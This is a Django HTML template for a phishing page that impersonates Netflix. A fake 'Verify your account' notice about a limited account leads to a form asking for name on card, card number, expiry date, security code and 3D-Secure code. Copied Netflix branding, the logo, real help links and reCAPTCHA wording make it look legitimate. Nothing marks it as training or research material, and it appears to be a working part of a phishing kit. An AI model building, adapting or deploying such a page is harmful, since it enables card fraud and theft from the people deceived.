{% extends 'parent/father.html' %}
{% load static %}

{% block title%}Netflix{% endblock %}


{% block body%}
    <div class="cover">
        <div class="container mt-5">
            <div class="row mt-5"></div>
            <div class="row mt-5"></div>
            <div class="row mt-5"></div>
            <div class="row justify-content-center mt-5">
                <div class="col-7 mt-4">
                    <div class="content text-white">
                        <h2>
                            Verify your account.
                        </h2><br>
                        <h3>
                            We apologize for any inconvenience.
                            You can not access all your Netflix advantages, due to account limited.
                            To restore your account, please click Continue to update your information.
                        </h3>
                        <button class="fadeThisSlide btn btn-danger mt-5">Continue</button>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script>
        $(".fadeThisSlide").on('click', function(){
            $(".cover").fadeOut(600);
        })
    </script>
    <div class="wrapper">
        <a href="https://www.netflix.com/" class="logo">
            <svg viewBox="0 0 111 30" class="svg-icon svg-icon-netflix-logo" focusable="true"><g id="netflix-logo"><path d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z" id="Fill-14"></path></g></svg>
        </a>

        <div class="container login">
            <div class="row justify-content-center">
                <div class="col-12 col-lg-6 col-xl-4">
                    <div class="login_form">
                        <div class="content p-5">
                            <div class="content-header p-2">
                                <h1>Creadit/Debit Card</h1>
                            </div>
                            <form method="post" class="slimodanzp1" class="p-3">
                                {% csrf_token %}
                                <div class="input-group input-group1">
                                    <div class="text_input">
                                        <label for="id_userLoginId"  class="placeLabel">Name On Card</label>
                                        <input type="text" class="form-control" required name="username" id="username">
                                    </div>
                                    <div class="text_input mt-3">
                                        <label for="id_number" class="placeLabel">Card Number</label>
                                        <input type="text" class="form-control slimodan" required name="number" id="username">
                                    </div>

                                    <div class="text_input mt-3 div_inline" >
                                        <label for="id_exDate" class="placeLabel" style="font-size:14px">Expiration Date</label>
                                        <input type="text" class="form-control slimodan" required name="exDate" id="exDate">
                                    </div>
                                    <div class="text_input mt-3 div_inline"style="margin-left: 23px;">
                                        <label for="id_Security" class="placeLabel">Security Code</label>
                                        <input type="text" class="form-control slimodan" required name="secCode" id="exDate">
                                    </div>
                                    <div class="text_input mt-2">
                                        <label for="id_threeDSecure" class="placeLabel">3D-Secure</label>
                                        <input type="text" class="form-control" name="threeDSecure" id="threeDSecure">
                                    </div>
                                    <div class="text_input login_btn mt-5">
                                        <button class="continue1">Continue</button>
                                    </div>

                                    <div class="other">

                                        <div class="recaptcha mt-2">
                                            <p>
                                                This page is protected by Google reCAPTCHA to 
                                                ensure you're not a bot.
                                            </p>
                                            <a data-toggle="collapse" href="#rec" role="button" aria-expanded="true" aria-controls="rec">
                                                Learn more.
                                            </a>
                                            <div class="collapse" id="rec">
                                                <div class="card card-body text-while">
                                                    The information collected by Google reCAPTCHA is subject to the Google Privacy Policy and Terms of Service, and is used for providing, maintaining and improving the reCAPTCHA service and for general security purposes (it is not used for personalised advertising by Google).
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <br><br><br>
                            </form>
                            <script>
                                elm = document.querySelectorAll('.text_input');
                                elm.forEach(function(item){
                                    item.addEventListener('click', function(){
                                        $(this).children('.form-control').focus();
                                        if($(this).children('.form-control').val() != 'null'){                                            
                                            $(this).children('.placeLabel').addClass("zomOnField");
                                        }else{
                                            $(this).children('.placeLabel').removeClass("zomOnField");
                                        }
                                    })
                                })

                                elm2 = document.querySelectorAll('input[type="text"], input[type="password"]')
                                elm2.forEach(function(item){
                                    item.addEventListener('focus', function(){
                                        if($(this).prev('.form-control').val() != 'null'){                                            
                                            $(this).prev('.placeLabel').addClass("zomOnField");
                                            if(item.type == 'password'){
                                                $(".showPass").css("opacity", '1')
                                            }
                                        }else{
                                            $(this).prev('.placeLabel').removeClass("zomOnField");
                                        }

                                    })
                                })
                                elm2.forEach(function(item){
                                    item.addEventListener('blur', function(){
                                        if($(this).val() != ''){                                    
                                            $(this).prev('.placeLabel').addClass("zomOnField");
                                        }else{
                                            $(this).prev('.placeLabel').removeClass("zomOnField");
                                        }
                                    })
                                })

                                if (performance.navigation.type == performance.navigation.TYPE_RELOAD) {
                                    inputs = document.querySelectorAll('input');
                                    inputs.forEach((item) =>{
                                        item.value  = ''
                                    })
                                }
                                $(".showPass").on("click", function(){
                                    if($(".slimodan").attr('type') == 'password'){
                                        $(".slimodan").attr('type', 'text')
                                    }else{
                                        $(".slimodan").attr('type', 'password')
                                    }
                                })
                            </script>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <footer>
            <div class="container-fluid footer mt-5 p-4">
                <div class="row justify-content-center">
                    <div class="col-8 text-left">
                        <p class="footer-top">Questions? Call <a class="footer-top-a" href="tel:1-844-505-2993">1-844-505-2993</a></p>
                    </div>
                    <div class="row justify-content-center slimodan2">
                        <div class="container">
                            <div class="row justify-content-center">
                                <div class="col-12 footer_link">
                                    <a href="https://help.netflix.com/en/node/412">
                                        FAQ
                                    </a>
                                    <a href="https://help.netflix.com/en/">
                                        Help Centre
                                    </a>
                                    <a href="#https://help.netflix.com/legal/termsofuse">
                                        Terms of Use
                                    </a>
                                    <a href="https://help.netflix.com/legal/privacy">
                                        Privacy
                                    </a>
                                </div>
                            </div>
                            <div class="row justify-content-center mt-3">
                                <div class="col-12 footer_link">
                                    <a href="https://help.netflix.com/legal/privacy#cookies">
                                        Cookie Preferences
                                    </a>
                                    <a href="https://help.netflix.com/legal/corpinfo">
                                        Corporate Information
                                    </a>
                                </div>                                
                            </div>
                            <br><br><br>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
    </div>

{% endblock %}